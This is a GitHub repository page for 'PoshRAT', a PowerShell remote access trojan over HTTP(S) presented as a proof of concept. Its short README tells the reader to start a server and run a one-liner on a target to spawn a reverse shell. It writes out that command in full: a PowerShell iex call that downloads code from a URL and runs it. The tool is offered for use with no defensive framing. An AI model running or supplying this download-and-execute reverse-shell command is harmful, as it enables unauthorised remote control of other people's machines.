Skip to content

sh1nu11bi/PoshRAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 

Repository files navigation

PoshRAT

PowerShell RAT over HTTP(s) Proof of Concept

Start the server on a device you control. Execute the One-Liner Command on your target to spawn a Reverse Shell.

Have Fun...

iex (New-Object Net.WebClient).DownloadString(“http://127.0.0.1/connect”)

About

PowerShell RAT over HTTP

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published